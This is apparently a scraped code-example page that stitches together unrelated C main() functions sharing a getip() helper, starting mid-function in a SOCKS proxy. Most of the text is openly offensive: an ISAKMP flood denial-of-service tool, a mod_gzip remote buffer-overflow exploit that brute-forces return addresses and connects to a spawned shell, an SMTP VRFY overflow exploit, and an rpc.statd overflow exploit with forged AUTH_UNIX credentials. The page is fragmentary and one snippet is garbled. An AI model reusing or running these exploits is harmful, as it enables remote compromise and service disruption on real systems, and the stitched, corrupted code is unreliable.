						buf[0]=buf[1]=buf[2]=0;
						buf[3]=1;
						if((len = recvfrom(param->remsock, buf+10, 65535 - 10, 0, (struct sockaddr *)&tsin, &sasize)) <= 0) {
							param->res = 468;
							break;
						}
						param->statssrv+=len;
						param->nreads++;
						memcpy(buf+4, &tsin.sin_addr.s_addr, 4);
						memcpy(buf+8, &tsin.sin_port, 2);
						sasize = sizeof(param->sins);
						if(socksendto(param->clisock, &sin, buf, len + 10, conf.timeouts[SINGLEBYTE_L]*1000) <=0){
							param->res = 469;
							break;
						}
#if SOCKSTRACE > 1
fprintf(stderr, "UDP packet relayed to client from %s:%hu size %d\n",
			inet_ntoa(tsin.sin_addr),
			ntohs(tsin.sin_port),
			len
	);
fflush(stderr);
#endif

					}
				}
				break;
			default:
				param->res = 417;
				break;
		}
	}
 }
 
 if(command > 3) command = 0;
 if(buf){
	 sprintf((char *)buf, "%s ", commands[command]);
	 if(param->hostname){
	  sprintf((char *)buf + strlen((char *)buf), "%.265s", param->hostname);
	 }
	 else myinet_ntoa(param->req.sin_addr, (char *)buf+strlen((char *)buf));
         sprintf((char *)buf+strlen((char *)buf), ":%hu", ntohs(param->req.sin_port));
	 (*param->srv->logfunc)(param, buf);
	 myfree(buf);
 }
 freeparam(param);
 return (NULL);
}
int main(int argc, char **argv){
	char *version = "0.3a";
	u_long source, destination;
	int lineopt, 
	    port = 0, 
	    nb, 
	    nbs = 1,
	    loop = 0,
	    number = 0,
	    pkt_len,
	    src_ok = 0,
	    dst_ok = 0,
	    length = 0;

	printf("--- nb-isakmp.c v.%s / Nelson Brito / Independent Security Consultant ---\n", version);

	(argc < 4) ? usage(argv[0]) : (char *)NULL;

	signal(SIGHUP,  SIG_IGN);
	signal(SIGINT,  u_abort);
	signal(SIGTERM, u_abort);
	signal(SIGKILL, u_abort);
	signal(SIGQUIT, u_abort);

	while(1){
		static struct option my_opt[]={
			{"source",	1, 0, 's'},
			{"destination",	1, 0, 'd'},
			{"port",	1, 0, 'p'},
			{"number",	1, 0, 'n'},
			{"length",	1, 0, 'l'},
			{"loop",	0, 0, 'L'},
			{"help",	0, 0, 'h'},
			{0,		0, 0, 0}
		};

		int option_index = 0;
		lineopt = getopt_long(argc, argv, "s:d:p:n:l:Lh", my_opt, &option_index);

		if(lineopt == -1) break;

		switch(lineopt){
			case 's':
				source = getip(optarg); src_ok =1; break;
			case 'd':
				destination = getip(optarg); dst_ok = 1; break;
			case 'p':
				port = atoi(optarg); break;
				if((port <= 0) || (port > 65535)){
					printf("main(): port range error.\n");
				}
			case 'n':
				number = atoi(optarg); break;
			case 'l':
				length = atoi(optarg); break;
			case 'L':
				loop = 1; break;
			case 'h':
			default:
				usage(argv[0]); break;
		}
	}

	if((!src_ok) || (!dst_ok)) usage(argv[0]);

	if((nb = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))< 0){
		printf("main(): socket() error.\n");
		exit(0);
	}
	
	if(setsockopt(nb, IPPROTO_IP, IP_HDRINCL, (char *)&nbs, sizeof(nbs)) < 0){
		printf("main(): setsockopt() error.\n");
		exit(0);
	}

	pkt_len = length ? length : ISAKMP_LEN;

	isakmp_dos(nb, source, destination, port, number, loop, pkt_len);

	printf("\nRock my world, baby!\n");
	return(1);
}
Beispiel #25
0
int main(int argc, char * argv[]) 
{

    int n;
    int s;
    int c;
    int sent;
    char line[MAXSIZE];
    char buf[BUFSIZ + 1];

    struct hostent * host;
    struct sockaddr_in addr;

    char * ip;
       
    if (( s = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
    	perror("Socket");
    	exit(1);
    }
    addr.sin_family = AF_INET;
    addr.sin_port = htons(80);

    ip = getip(argv[1]);
    if (ip == 0) {
    	printf("Invalid host\n");
    	exit(1);
    }
    
    //addr.sin_addr.s_addr = inet_addr(argv[1]);
    if (inet_pton(AF_INET, ip, &addr.sin_addr.s_addr) <= 0) {
    	perror("inet_pton");
    	exit(1);
    }
    
    //Connect to the server
    if (connect(s, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) {
    	perror("Connect");
    	exit(1);
    }

    printf("Connected to host\n");

    memset(line, 0, MAXSIZE);
    sprintf(line, "GET %s HTTP/1.1\r\nConnection: close\r\n\r\n",
    	    argv[2]);

    printf("Sending request... \n===\n%s===\n", line);

    //attempt to send

      //Send the query to the server
      sent = 0;
      while(sent < strlen(line))
      {
         n = send(s, line+ sent, strlen(line)-sent, 0);
        if(n < 0){
          perror("Can't send query");
          exit(1);
        }
        sent  = sent + n;
      }


    n = 0;
    printf("receiving...\n");
    memset(buf, 0, BUFSIZ + 1);
    while((n = recv(s, buf, BUFSIZ, 0)) > 0){
    	if (strlen(buf) == 0) {break;}
    	fprintf(stdout, buf);
	memset(buf, 0, BUFSIZ + 1);
    }
    close(s);

}
Beispiel #26
0
int main(int argc, char **argv) {
 
    	int i=0;     
    	struct sockaddr_in sockstruct;
    	struct hostent *HOST;
    	char tmp[20000];
	char buf1[5000],buf2[10000];
    	int sock;
    	fd_set  rset;
	int port=80,shellport=2003;
	int step=STEP;
	char *victim=NULL;
	long ret=0xbfffffff,ret_err;
	int brutemode=0;
	char *shellcode,*jmp;
	int trg=0;

printf("\nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]\n\t\t by xCrZx [crazy_einstein] /05.06.03/\n");

	for(i=0;i<argc;i++) {
		if(argv[i][1]=='h') victim=argv[i+1];
		if(argv[i][1]=='p') port=atoi(argv[i+1]);
		if(argv[i][1]=='t') {ret=targets[atoi(argv[i+1])].ret;trg=atoi(argv[i+1]);}
               	if(argv[i][1]=='r') sscanf(argv[i+1],"0x%x",&ret);	
		if(argv[i][1]=='b') { brutemode=1; ret=strtoul(argv[i+1],0,16);}
		if(argv[i][1]=='s') { step=atoi(argv[i+1]);}
	}

	if(!victim || ret==0) usage(argv[0]);

	ret_err=targets[trg].std_err;
	shellcode=targets[trg].shellcode;
	jmp=targets[trg].jmp;

	printf("\nUsing: ret_err = 0x%x, ret = 0x%x",ret_err,ret);
	if(brutemode) printf(" ,step = %d\n",step);
	
	printf("\n");
	
	if(brutemode)printf("[~] Brutemode activated!\n");

	do {
    	
    	sock=socket(PF_INET,SOCK_STREAM,0);
    	sockstruct.sin_family=PF_INET; 
    	sockstruct.sin_addr.s_addr=getip(victim);
    	sockstruct.sin_port=htons(port);

    	if(!brutemode)printf("\n[!] Connecting to %s:%d\n",victim,port);
   
      	if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {

        	if(!brutemode)printf("[+] Connected!\n",i);

		memset(tmp ,0x00,sizeof tmp );
               	memset(buf1,0x00,sizeof buf1);
	       	memset(buf2,0x00,sizeof buf2);

		memset(buf1,0x90,2016);
		memcpy(buf1+strlen(buf1),jmp,strlen(jmp));
		memset(buf1+strlen(buf1),0x90,2280);
		*(long *)&buf1[strlen(buf1)]=ret_err;
		for(i=0;i<100;i++) *(long *)&buf1[strlen(buf1)]=ret;

		memset(buf2,0x90,1000);
		memcpy(buf2+strlen(buf2),shellcode,strlen(shellcode));
		
		sprintf(tmp,fmt,buf1,victim,strlen(buf2),buf2);
		write(sock,tmp,strlen(tmp));

      	}else { printf("[x] Error: Could not connect to %s:%d!\n",victim,port);exit(0);}
    
      	close(sock);

	ret-= step;

	if(brutemode) {printf(".");fflush(stdout);}
	

	if(!brutemode) {	
		printf("[*] Trying to connect to %s:%d port!!! Pray for success!\n",victim,shellport);
		printf("[*] Sleeping at 2 seconds...\n");
	}
	
	sleep(2);
	
       	sock=socket(PF_INET,SOCK_STREAM,0);

	bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_zero));
	sockstruct.sin_family=PF_INET; 
       	sockstruct.sin_addr.s_addr=getip(victim);
       	sockstruct.sin_port=htons(shellport);

       	if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
	        printf("\n[!] Shell is accessible!\n\n");
	        write(sock, "id;uname -a\n", 12); 
	        while (1) {
	                FD_ZERO(&rset);
	                FD_SET(sock,&rset);
	                FD_SET(STDIN_FILENO,&rset);
	                select(sock + 1, &rset, NULL, NULL, NULL);

       			if (FD_ISSET(sock, &rset)) {
	                        i = read(sock, tmp, sizeof(tmp) - 1);
	                        if (i <= 0) {
	                                printf("[!] Connection closed.\n");
	                                close(sock);
	                                exit(0);
	                        }
                        tmp[i] = 0;
                        printf("%s", tmp);
	                }
        	        if (FD_ISSET(STDIN_FILENO, &rset)) {
                	        i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1);
                        	if (i > 0) {
                                	tmp[i]=0;
	                                write(sock, tmp, i);
        	                }
                	}
	        }
       	} else if(!brutemode)printf("[x] Shell is inaccessible..\n\n");

       	close(sock);

	} while ( brutemode );

      
    	return 0;
}
Beispiel #27
0
int main() {
	char *url = "www.3322.org/dyndns/getip";
	getip(url);
	return 0;
}
main (int argc, char *argv[])
{
  int sock,targethost,sinlen;
  struct sockaddr_in sin;
  static unsigned char buffer[20000];
  unsigned char *ptr,*ptr2;
  unsigned long ret_addr;
  int len,x = 1;
  unsigned long rw_mem;


#ifndef UNIX
  WORD wVersionRequested;
  WSADATA wsaData;
  int err;

  wVersionRequested = MAKEWORD( 2, 2 );
  err = WSAStartup( wVersionRequested, &wsaData );
  if (err != 0) exit(1);
#endif
  if (argc < 4) usages(argv[0]);


  targethost = getip(argv[1]);


   len = strlen(argv[2]);
    if (len > 60)
     {
       printf("Bad http format!\n");
       usages(argv[0]);
     }

   ptr = argv[2];
   while (x <= len)
      {
        x++;
        (*ptr)++;           /*Encrypt the http ip for later parsing */
        ptr++;
      }

  if( (sscanf(argv[3],"0x%x",(unsigned long *) &ret_addr)) == 0)
    {
      printf("Input error, the return address has incorrect format\n");
      exit(0);
    }


  sock = socket(AF_INET,SOCK_STREAM,0);

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = targethost;
  sin.sin_port = htons(25);
  sinlen = sizeof(sin);


  printf("Starting to create the egg\n");
  ptr = (char *)&buffer;
  strcpy(ptr,"VRFY ");
  ptr+=5;

  memset((void *)ptr, 0x90, 7000);
  ptr2=ptr;

  ptr2+=OFFSET;
  memcpy ((void *) ptr2,(void *)&ret_addr, 4);
  ptr2+=8;
  /* Put the code on the stack that transfers control to our code */
  memcpy((void *) ptr2, (void *)&controlcode, (sizeof(controlcode)-1) );

  ptr2=ptr;
  ptr2+=LENGTH;
  (*ptr2)=0x00;


  ptr+=CODEOFFSET;
  memcpy((void *) ptr,(void *)&code,strlen(code));


  (char *) ptr2 = strstr(ptr,"\xb1");
  if (ptr2 == NULL)
     {
       printf("Bad shell code\n");
       exit(0);
     }
  ptr2++;
  (*ptr2)+= len + ( sizeof(dir) );

   (char *) ptr2 = strstr(ptr,"\x83\xc6");
     if (ptr2 == NULL)
      {
        printf("Bad shell code\n");
        exit(0);

      }

  ptr2+= 2;

  (*ptr2)+= len + 8;

  ptr+=strlen(code);
  memcpy((void *) ptr, (void *) argv[2], len);   /*Parse in the http
  site's info */
  ptr+=len;
  memcpy((void *) ptr,(void*) &dir, (sizeof(dir)-1) );

  printf("Made the egg\n");

    if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
     {
       perror("error:");
       exit(0);
     }
    printf("Connected.\n");

#ifndef UNIX
        send(sock, (char *)&buffer, strlen((char *)&buffer), 0);
        send(sock,"\r\n",2,0);
#else
    write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char
*)&buffer */
    write(sock,"\r\n",2);
#endif
    SLEEP(1);
    printf("Sent the egg\n");
#ifndef UNIX
  WSACleanup();
#endif
    CLOSE(sock);
   exit(1);
}
Beispiel #29
0
int main(int argc, char* argv[]){
	int fd, pasv_fd;
	char buf[MAX_LENGTH] = {0};
	char file[MAX_FILE_SIZE] = {0};
	char pasv_ip[MAX_LENGTH];
	int  pasv_port;

	parse_args(argc, argv);
	getip(sv.ip, sv.host);
	
	//Ask for account data if it wasnt used in link.
	if(strcmp(sv.user, "_undefined")==0 || strcmp(sv.pass, "_undefined")==0){
		printf("[App] Username: "******"%s", sv.user);
		printf("[App] Password: "******"%s", sv.pass);
		printf("\n");
	}
	
	printf("RCOM FTP Application Initialized\n");	
	printf("-----------------------------\n");
	printf("Hostname : %s\n", sv.host);
	printf("IP Addr  : %s\n", sv.ip);
	printf("Port     : %d\n", sv.port);
	printf("Username : %s\n", sv.user);
	printf("Password : %s\n", sv.pass);
	printf("Path     : %s\n", sv.path);
	printf("File     : %s\n", sv.file);
	printf("-----------------------------\n");
	
	// FTP Application
	fd = tcp_open(sv.ip, sv.port); 			// Open Connection
	
	tcp_read(fd, buf);						// Read 220, Server Welcome Message
	
	sprintf(buf, "user %s\n", sv.user);		// Write Username Data and get Reply
	tcp_write(fd, buf);
	tcp_read(fd, buf);
	
	sprintf(buf, "pass %s\n", sv.pass);		// Write Password Data and get Reply
	tcp_write(fd, buf);
	tcp_read(fd, buf);
	
	sprintf(buf, "cwd .%s\n", sv.path);		// Change Directory and get Reply
	tcp_write(fd, buf);
	tcp_read(fd, buf);
	
	sprintf(buf, "pasv\n");					// Enter Passive Mode and get Reply
	tcp_write(fd, buf);
	tcp_read(fd, buf);
	
	pasv_port = calculate_pasv_data(buf, pasv_ip);		
	printf("[App] Passive Mode Data - Address: %s, Port: %d\n", pasv_ip, pasv_port);
	
	pasv_fd = tcp_open(pasv_ip, pasv_port);	// Open Secondary Stream and Download File
	
	(void) signal(SIGALRM, retr_alarm);	
	retr_fd = fd;
	sprintf(buf, "retr %s\n", sv.file);	
	strcpy(retr_buf, buf);
	alarm(RETR_DELAY);
	
	tcp_getfile(pasv_fd, file);	
	
	tcp_close(pasv_fd);						// Close Connections
	tcp_close(fd);							
	
	return 0;
}
Beispiel #30
0
int
main(int argc, char **argv)
{
    int ch;
    char *buff;

    CLIENT *clnt;
    enum clnt_stat res;
    struct timeval tv, tvr;
    struct sm_name smname;
    struct sm_stat_res smres;
    struct sockaddr_in addr;

    int type = -1;
    int usetcp = 0;
    int timeout = 5;
    int wipe = 9;
    int offset = 600;
    int buflen = 1024;
    char *target;
    char *sc = shellcode;
    u_short port = 0;
    u_long bufpos = 0;

    int sockp = RPC_ANYSOCK;

    extern char *optarg;
    extern int optind;
    extern int opterr;
    opterr = 0;


    while((ch = getopt(argc, argv, "tp:a:l:o:w:s:d:")) != -1)
    {
        switch(ch)
        {
            case 't': usetcp = 1; break;
            case 'p': sscanf(optarg, "%hu", &port); break;
            case 'a': sscanf(optarg, "%lx", &bufpos); break;
            case 'l': buflen = atoi(optarg); break;
            case 'o': offset = atoi(optarg); break;
            case 's': timeout = atoi(optarg); break;
            case 'w': wipe = atoi(optarg); break;
            case 'd': type = atoi(optarg); break;
            default : usage(argv[0]);
        }
    }

    if(!(target = argv[optind]))
    {
        fprintf(stderr, "No target host specified\n");
        exit(EXIT_FAILURE);
    }

    if(type >= 0)
    {
        if(type >= sizeof types / sizeof types[0] - 1)
        {
            fprintf(stderr, "Invalid type\n");
            exit(EXIT_FAILURE);
        }

        sc = types[type].code;
        bufpos = types[type].bufpos;
        buflen = types[type].buflen;
        offset = types[type].offset;
        wipe = types[type].wipe;
    }

    if(!bufpos)
    {
        fprintf(stderr, "No buffer address specified\n");
        exit(EXIT_FAILURE);
    }

    bzero(&addr, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr = getip(target);

    tv.tv_sec = timeout;
    tv.tv_usec = 0;

    if(!usetcp)
    {
        clnt = clntudp_create(&addr, SM_PROG, SM_VERS, tv, &sockp);
        if(clnt == NULL)
        {
            clnt_pcreateerror("clntudp_create()");
            exit(EXIT_FAILURE);
        }
        tvr.tv_sec = 2;
        tvr.tv_usec = 0;
        clnt_control(clnt, CLSET_RETRY_TIMEOUT, (char *) &tvr);
    }
    else
    {
        clnt = clnttcp_create(&addr, SM_PROG, SM_VERS, &sockp, 0, 0);
        if(clnt == NULL)
        {
            clnt_pcreateerror("clnttcp_create()");
            exit(EXIT_FAILURE);
        }
    }

    /* AUTH_UNIX / AUTH_SYS authentication forgery */
    clnt->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);

    buff = wizardry(sc, bufpos, buflen, offset, wipe);
    smname.mon_name = buff;

    res = clnt_call(clnt, SM_STAT, (xdrproc_t) xdr_sm_name,
        (caddr_t) &smname, (xdrproc_t) xdr_sm_stat_res,
        (caddr_t) &smres, tv);

    if(res != RPC_SUCCESS)
    {
        clnt_perror(clnt, "clnt_call()");
        printf("A timeout was expected. Attempting connection to shell..\n");
        sleep(5); connection(addr);
        printf("Failed\n");
    }
    else
    {
        printf("Failed - statd returned res_stat: (%s) state: %d\n",
                smres.res_stat ? "failure" : "success", smres.state);
    }

    free(buff);
    clnt_destroy(clnt);
    return -1;
}